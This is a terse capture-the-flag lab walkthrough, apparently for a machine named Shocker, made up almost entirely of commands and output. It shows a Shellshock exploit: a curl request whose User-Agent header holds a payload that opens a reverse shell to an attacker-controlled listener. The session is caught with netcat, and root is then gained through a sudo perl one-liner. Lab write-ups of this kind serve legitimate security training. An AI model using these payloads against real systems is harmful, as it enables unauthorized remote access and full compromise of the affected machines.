2 :80 shellshock

$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.10/443 0>&1'" http://10.10.10.56/cgi-bin/user.sh

$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.56] 54834
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami;id
shelly
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
	
	
sudo /usr/bin/perl -e 'exec "/bin/bash";'

whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Last updated